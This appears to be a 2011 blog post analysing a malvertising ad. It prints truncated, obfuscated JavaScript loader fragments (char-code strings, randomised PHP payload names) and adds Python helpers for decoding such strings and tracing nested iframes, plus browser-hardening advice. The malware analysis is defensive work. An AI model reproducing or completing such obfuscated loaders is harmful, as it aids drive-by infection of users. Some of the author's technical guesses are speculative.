by   May 23 2011   
How Popups and Pop Unders install viruses on your computer while surfing the internet. In advertisements that load external sites through embedded iframes, the site delivering the malware or virus may use the following technique to stay undetected by the routine checks run by the sites that carry the advertising.

How Popups and Pop Unders install viruses on your computer while surfing the internet

Before you can stop a virus from installing into a computer you need to understand how they are distributed.

Once you learn more about the delivery functions you can start setting your computer to better defend itself from attacks.

In this example I'll be using a live site located in Turkey that is actively used with major advertisement banners.

Before you visit the site you need to set up your browser to match how my virus test system is set.
ActiveX controls need to all be disabled.
Scripting of all types needs to be disabled.
Set the browser to warn on redirects.
In short, disable everything in your browser that would run any application.

In advertisements that load external sites through embedded iframes, the site delivering the malware or virus may use the following technique to stay undetected by the routine checks run by the sites that carry the advertising.




var seq = ["S","w","J","u","s","L","q","k","i","W","x","n","B","A","M","a","R","j","g","C","N","Q","I","t","V","e","U","P","K","z","r","c","T","p","l","h","y","E","d","D","m","H","X","b","Y","G","F","Z","o","O","f","v"], shift = 29;
var d_e5ba99c32 = 'e_e5ba99.php';

var cc = 1, ee = 1;


The first string sets up a randomly named PHP page that holds the install.exe file for download.
The script function that follows is meant to take advantage of browser exploits to force the load of the install.exe package without detection.
I've cut this down from the 29,000+ characters.
These characters are loaded into a var which I believe is used to overwhelm the browser.
I have come to this conclusion because the characters generated are random and not encoded scripts.

Test one (the site above):

var d_490bd6 = '4_490bd6.php';
(function() {
var temp="",i,pass2 = "",sou="";
var x304c1e = "60$100$98$84$120$72$75$32$75$118$72$115$61$34$75$115$79$75$47$77$119$97$119$100$98$84$120$72$75$34$62$97$119$84$32$85$120$100$75$87$119$78$115$32$61$32$87$115$101$32$66$84$84$119$118$40$39$36$101$120$87$87$75$36$39$44$32$39$51$55$39$44$32$39$49$50$53$50$48$56$53$48$39$44$32$39$54$75


Test two same site:
(by refreshing the browser the code changed to the following)

var d_e124e6ef = 'e_e124e6.php';
(function() {
var temp="",i,pass2 = "",sou="";
var x497 = "60&&83&&101&&109&&68&&85&&106&&32&&106&&122&&85&&69&&61&&34&&106&&69&&78&&106&&47&&66&&116&&89&&116&&83&&101&&109&&68&&85&&106&&34&&62&&89&&116&&109&&32&&102&&68&&83&&106&&86&&116&&118&&69&&32&&61&&32&&86&&69&&100&&32&&105&&109&&109&&116&&122&&40&&39&&36


Refreshing the browser once more resulted in the following code:

var d_e4da416a = '2_2ee665.php'+'?af'+'fid=';
var temp="",i,out="";
var x5b61 = "60.(#(115.(#(99.(#(114.(#(105.(#(112.(#(116.(#(32.(#(116.(#(121.(#(112.(#(1


The only thing that I see in common is that every time I refreshed the page the var attempted to load over 29,000 characters and attempted to launch the download of the install.exe file which was hidden in the random file x.php.
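All three captures above keep their payload in a quoted run of decimal character codes whose delimiter changed on every refresh ("$", "&&", ".(#("). The helper below is an added analysis example, not code from the page or from the ad it describes: it finds such strings in captured JavaScript, infers the delimiter from the first two numbers, decodes the codes to text and reports what a reviewer would want to know. The sample input is constructed from the first and third captures on the page, shortened and closed with a quote.

```python
"""Locate and decode delimited character-code strings in captured ad JavaScript.

Added example for analysts; not code from the page or from the ad it describes.
Each capture on the page stores its payload as a quoted run of decimal character
codes joined by a delimiter that changed on every refresh ("$", "&&", ".(#(").
This helper finds such strings, infers the delimiter from the first two numbers,
decodes the codes to text, and reports what a reviewer would want to know.
"""
import re
import string
from typing import Dict, List, Optional

# Constructed input: the first and third captures from the page, shortened and
# closed with a quote. The numbers themselves are the page's.
SAMPLE_JS = (
    'var x304c1e = "60$100$98$84$120$72$75$32$75$118$72$115$61$34$75$115$79$75$47";\n'
    'var x5b61 = "60.(#(115.(#(99.(#(114.(#(105.(#(112.(#(116.(#(32.(#(116.(#(121.(#(112";\n'
)

# A quoted string opening with 1-3 digits and then at least eight more
# (delimiter, 1-3 digits) pairs. The closing quote is not required, so
# truncated captures like the ones on the page are still matched.
_BLOB_RE = re.compile(r'"(\d{1,3}(?:[^\d"]{1,8}\d{1,3}){8,})')

_PRINTABLE = set(string.printable)


def infer_delimiter(blob: str) -> str:
    """Return the non-digit run between the first two numbers."""
    m = re.match(r"\d+([^\d]+)\d", blob)
    if m is None:
        raise ValueError("not a delimited char-code string")
    return m.group(1)


def decode_charcodes(blob: str, delimiter: Optional[str] = None) -> str:
    """Turn "60$100$98..." into the characters it encodes.

    Codes above 255 are rejected: every code on the page is plain ASCII, so a
    larger value means the delimiter guess is wrong rather than a real character.
    """
    delimiter = delimiter or infer_delimiter(blob)
    text = []
    for part in blob.split(delimiter):
        part = part.strip()
        if not part:
            continue  # trailing delimiter on a truncated capture
        if not part.isdigit():
            raise ValueError("non-numeric segment: %r" % part)
        code = int(part)
        if code > 255:
            raise ValueError("code %d out of range for this scheme" % code)
        text.append(chr(code))
    return "".join(text)


def scan_script(js_source: str) -> List[Dict]:
    """Describe every char-code blob found in js_source."""
    findings = []
    for m in _BLOB_RE.finditer(js_source):
        blob = m.group(1)
        try:
            delimiter = infer_delimiter(blob)
            decoded = decode_charcodes(blob, delimiter)
        except ValueError:
            continue
        printable = sum(c in _PRINTABLE for c in decoded) / len(decoded)
        findings.append({
            "delimiter": delimiter,
            "code_count": len(decoded),
            "printable_ratio": round(printable, 2),
            "decoded_preview": decoded[:40],
            # Markup inside a "data" string is the clearest sign that the
            # string is script to be assembled and run rather than random filler.
            "contains_markup": re.search(r"<\s*(script|iframe|object)\b", decoded, re.I) is not None,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_script(SAMPLE_JS):
        print(finding)
```

Decoding the third capture yields `<script typ`, plain markup. The first capture decodes to `<dbTxHK KvHs="KsOK/`: the letters are scrambled but the shape (a six-letter tag name, a space, a four-letter attribute and `="`) matches the third capture exactly, which is why the example reports the printable ratio alongside the markup check. The 52-letter `seq` array and `shift` value in the first snippet on the page appear to be the substitution alphabet for that extra layer; that reading is my inference, and the example does not attempt to reverse it.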

1. 4_490bd6.php
2. e_e124e6.php
3. 2_2ee665.php

Files 1, 2 and 3 were all the same, but the file name was created by a randomizing script.
I believe this method was used to trick the tracking of the actual file location, because once the page has been refreshed the page sent before is removed.

This was tested by refreshing and then attempting to download the file. Each test resulted in a page not found.
But when the page was hit and the source read before refreshing, I was able to download the file.

How does this work within advertisements?

Many ads offer image, Flash and embedded HTML.
When the advertiser uses HTML, the feed typically comes from a temporary location. In some cases this is to keep ad blockers from stopping the advertisement.

When the site loads an iframe and a second iframe inside it actually delivers the content, most ad blockers are useless at that point.
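The nesting described here, a publisher page that frames an ad network which in turn frames a different host that actually delivers the creative, can be checked by walking the iframe chain and recording which host sits at each hop. The example below is added here and is not code from the page; all hostnames and documents are constructed placeholders, and `fetch` is a caller-supplied function so the walk can run offline against stored HTML.

```python
"""Trace the chain of nested iframes an ad placement would load.

Added example, not code from the page. It models the situation the page
describes: the publisher embeds an ad network frame, and that frame embeds a
second frame on another host that actually delivers the content. All hostnames
and documents below are constructed placeholders, and `fetch` is a caller-
supplied function so the check can run offline against stored HTML.
"""
from html.parser import HTMLParser
from typing import Callable, Dict, List, Optional
from urllib.parse import urljoin, urlparse

# Constructed documents keyed by resolved URL. The third hop uses a
# protocol-relative src, which is resolved against its parent frame's URL.
PAGES: Dict[str, str] = {
    "https://publisher.example/article":
        '<html><body><p>Article</p>'
        '<iframe src="https://adnetwork.example/serve?slot=top"></iframe></body></html>',
    "https://adnetwork.example/serve?slot=top":
        '<html><body><iframe src="//cdn-third.example/creative/x.php" '
        'width="1" height="1"></iframe></body></html>',
    "https://cdn-third.example/creative/x.php":
        "<html><body><script>/* final creative */</script></body></html>",
}
# A plain image ad for comparison: nothing nested.
IMAGE_AD_PAGE = '<html><body><img src="https://adnetwork.example/banner.gif"></body></html>'


class _IframeCollector(HTMLParser):
    """Collects the src attribute of every <iframe> in a document."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() == "iframe":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def iframe_srcs(html: str, base_url: str) -> List[str]:
    """Absolute URLs of all iframes in html, resolved against base_url."""
    parser = _IframeCollector()
    parser.feed(html)
    return [urljoin(base_url, src) for src in parser.srcs]


def trace_iframe_chain(start_url: str, fetch: Callable[[str], Optional[str]],
                       max_depth: int = 5) -> List[Dict]:
    """Breadth-first walk of iframe nesting starting at start_url.

    fetch(url) returns the HTML for url, or None if it cannot be retrieved.
    The page notes the delivery URLs disappeared after a refresh, so an
    unreachable hop is itself worth recording rather than skipping.
    """
    origin_host = urlparse(start_url).hostname
    hops: List[Dict] = []
    queue = [(start_url, 0)]
    seen = set()
    while queue:
        url, depth = queue.pop(0)
        if url in seen or depth > max_depth:
            continue
        seen.add(url)
        html = fetch(url)
        children = iframe_srcs(html, url) if html is not None else []
        hops.append({
            "url": url,
            "depth": depth,
            "host": urlparse(url).hostname,
            "third_party": urlparse(url).hostname != origin_host,
            "fetched": html is not None,
            "children": children,
        })
        queue.extend((child, depth + 1) for child in children)
    return hops


def review_placement(start_url: str, fetch: Callable[[str], Optional[str]]) -> Dict:
    """Summarise a chain: how deep it goes and whether a third party sits two hops down."""
    hops = trace_iframe_chain(start_url, fetch)
    return {
        "max_depth": max(h["depth"] for h in hops),
        "hosts": [h["host"] for h in hops],
        "unreachable": [h["url"] for h in hops if not h["fetched"]],
        # The pattern from the text: the party that finally delivers the
        # content is at least two frames removed from the publisher.
        "nested_third_party": any(h["depth"] >= 2 and h["third_party"] for h in hops),
    }


if __name__ == "__main__":
    print(review_placement("https://publisher.example/article", PAGES.get))
```

For the constructed chain the review reports three hosts, a depth of two and `nested_third_party` set, while the image-only page reports depth zero. A hop that cannot be fetched is listed under `unreachable` but still counts toward the nesting flag, since an ad whose final frame has already vanished is exactly the case the page describes.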

My theory regarding this method is that media advertisers restrict the content enough that some advertisers use iframes to change the ad to better suit the company after the first advertisement was approved.

To do this they would need to use third party sites or iframes.
I have not seen any viruses downloaded from anything other than HTML iframed advertisements. But this doesn't mean that a virus cannot be downloaded from a swf (Flash) advertisement.

Once the advertisement has delivered its payload to a specific number of PCs, they could switch to the valid advertisement by making a change to the content location.

I have seen this first hand from anti-spyware companies with pop-under banner advertisements. They would run the advertisement a few times, then stop the secondary download script. This could be triggered by errors or by the success of the download.

A banner on Coupons.com infected a computer with an online poker site, which wasn't one of the major ones, but the advert installed and ran without the computer user's permission.

It's a violation of your privacy to be infected this way, and the advertisers that offer iframes or ads work much in the same way as I listed.

The above samples came from a virus advertisement that was displayed on a popular social network for art, http://www.deviantart.com.

It is clear they have issues with banner advertisements, judging by what their technical support said and by the link they offered to report the advertisement.


quote:
--------------------------------------------------------------------------------

Submit a deviantART Advertising Complaint
http://spreadsheets.google.com/viewform?key=pgI_7tRdDtfTLK0L1ZJ5VYw

--------------------------------------------------------------------------------


If you look at the drop-down list on the report form you'll find:

quote:
--------------------------------------------------------------------------------

pop-up / pop-under
Virus / Worm
Malicious re-direct
Inappropriate Content

--------------------------------------------------------------------------------


This gives me the impression they process many reports.
My advice would be to disable all scripting on the deviantart.com website. This will not stop you from surfing or browsing the site; it will only stop the active content, such as their advertisements.

I've posted topics like this before, mostly in the forums of the sites that were infected with virus advertisements, and each one has responded with the same corporate script:


quote:
--------------------------------------------------------------------------------

Please note we have very strict guidelines for all of our advertising partners and we don’t allow any forms of “viruses” to run on dA. We would never, ever, knowingly run anything that is remotely malicious on the site.

--------------------------------------------------------------------------------


Each site claims not to know about these viruses but has channels to take virus advertisement complaints.
Each site says it has strict guidelines for advertisers but does nothing for long periods of time.
The Digitalspy.com post (http://www.digitalspy.co.uk/forums/showthread.php?t=237547&highlight=muraz) was the second attempt to bring attention to the issue of advertisements infecting computers.
The link posted above was my second attempt after the moderators deleted my first post.

In the case of deviantART my notice was marked as resolved.

The issue careful computer users face today is what I have posted here.
If the URL, page, delivery function or iframe of the advertisement has changed by the time it's reported, the people with the power to remove the advertisement see nothing wrong and let it continue.

Nothing changes until people like me post how to turn off scripts while still being able to use the site for what it was built for.
You can even install firewalls with ad blockers that will cut out all of their advertisements.

It isn't good business not to follow up on reports of confirmed viruses in advertisements, so consumers should do the following to remove the threat from advertisement banners:

ActiveX Controls and Plug-ins
Disable all.
Java VM
Disable or prompt.
Scripting
Active scripting: disable.
Disable all.

Once you disable the scripts you'll notice sites change.
You can then add sites you visit to your safe zones or trusted sites.
But keep in mind that many large social networking sites you think you can trust will have malware advertisements attempting to infect your computer. It's best not to trust sites other than your bank and your software vendor.

In fact, if you have ever read any of my phishing site reports, you would know that with all scripts disabled you would see the site is not your bank, because its URL would not match the entry for your bank in your Trusted Sites list under Security in Internet Options.

That's about it for this report.
Be safe when surfing.
Use a third-party software application for your firewall and AV.
Update daily and scan daily.

You'll get a virus sooner or later, but the impact will be minimal if you follow simple rules.
